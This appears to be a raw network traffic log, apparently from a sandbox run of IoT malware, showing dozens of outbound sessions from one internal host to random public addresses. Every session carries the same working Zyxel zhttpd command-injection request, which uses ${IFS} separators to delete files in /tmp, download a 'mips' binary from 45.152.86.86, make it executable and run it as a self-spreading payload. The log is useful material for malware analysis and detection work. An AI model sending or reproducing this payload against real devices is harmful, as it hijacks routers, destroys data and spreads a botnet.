                              Mar 31, 2024 08:41:12.622172117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1871192.168.2.1338696198.242.216.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622203112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1872192.168.2.135657452.35.189.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622248888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1873192.168.2.1335168148.110.40.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622282982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1874192.168.2.1333786187.229.227.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622317076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1875192.168.2.136090225.77.77.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622335911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1876192.168.2.1337180206.107.189.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622369051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1877192.168.2.1347206145.53.28.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622428894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1878192.168.2.1351628152.190.38.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622454882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1879192.168.2.133418458.102.184.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622517109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1880192.168.2.135280460.195.118.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622545004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1881192.168.2.135202891.187.100.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622587919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1882192.168.2.134616072.235.79.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622634888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1883192.168.2.134216090.45.87.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622695923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1884192.168.2.1353540166.21.197.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622736931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1885192.168.2.1335076188.54.14.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622750998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1886192.168.2.133698240.155.36.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622812033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1887192.168.2.133967466.88.92.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622853041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1888192.168.2.1342692167.169.180.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622895002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1889192.168.2.1333576140.217.243.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622931004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1890192.168.2.1360102120.121.237.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622965097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1891192.168.2.1339432142.231.210.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.622986078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1892192.168.2.1357246175.39.193.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623045921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1893192.168.2.135164251.95.37.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623070002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1894192.168.2.1357270131.164.252.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623120070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1895192.168.2.134334419.101.202.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623153925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1896192.168.2.1360888157.113.131.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623192072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1897192.168.2.134430240.232.55.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623224020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1898192.168.2.1341384141.57.237.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623279095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1899192.168.2.1353692112.33.38.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623316050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1900192.168.2.1343626108.4.246.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623342037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1901192.168.2.1350072112.173.1.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623418093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1902192.168.2.135021676.50.97.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623436928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1903192.168.2.1348398158.17.221.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623491049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1904192.168.2.1333406179.205.13.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623528957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1905192.168.2.13602544.66.242.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623560905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1906192.168.2.1337854160.117.33.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623601913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1907192.168.2.1345130210.189.190.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623642921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1908192.168.2.1343474216.144.4.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623688936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1909192.168.2.1350720122.25.15.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623733044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1910192.168.2.135172477.57.200.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623764992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1911192.168.2.1357258208.96.144.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623796940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1912192.168.2.133444425.0.231.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623855114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1913192.168.2.1345194155.13.51.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623891115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1914192.168.2.1350106186.224.223.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623927116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1915192.168.2.135022298.47.100.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.623982906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1916192.168.2.135571618.119.213.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624025106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1917192.168.2.133279441.11.28.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624070883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1918192.168.2.1334612123.133.164.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624102116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1919192.168.2.1338548171.209.8.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624145031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1920192.168.2.133582458.73.198.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624165058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1921192.168.2.135830048.219.16.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624192953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1922192.168.2.1359548120.71.27.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624233007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1923192.168.2.1334774153.163.111.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624257088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1924192.168.2.1357756213.241.168.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624275923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1925192.168.2.135552076.88.4.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624315023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1926192.168.2.1343682217.64.197.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624344110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1927192.168.2.1339494141.48.116.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624394894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1928192.168.2.135092218.104.100.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624433994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1929192.168.2.1357342166.148.29.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624476910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1930192.168.2.1350694138.1.152.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624521971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1931192.168.2.136041653.142.161.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624567986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1932192.168.2.1358184166.42.147.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624586105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1933192.168.2.1336770146.36.236.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624634027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1934192.168.2.134289891.74.116.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624659061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1935192.168.2.1350772137.127.174.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624691963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1936192.168.2.1360642165.97.245.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624749899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1937192.168.2.1342372138.73.43.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624789953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1938192.168.2.134588891.179.196.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624824047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1939192.168.2.136031251.181.222.170443
                              TimestampBytes transferredDirectionData
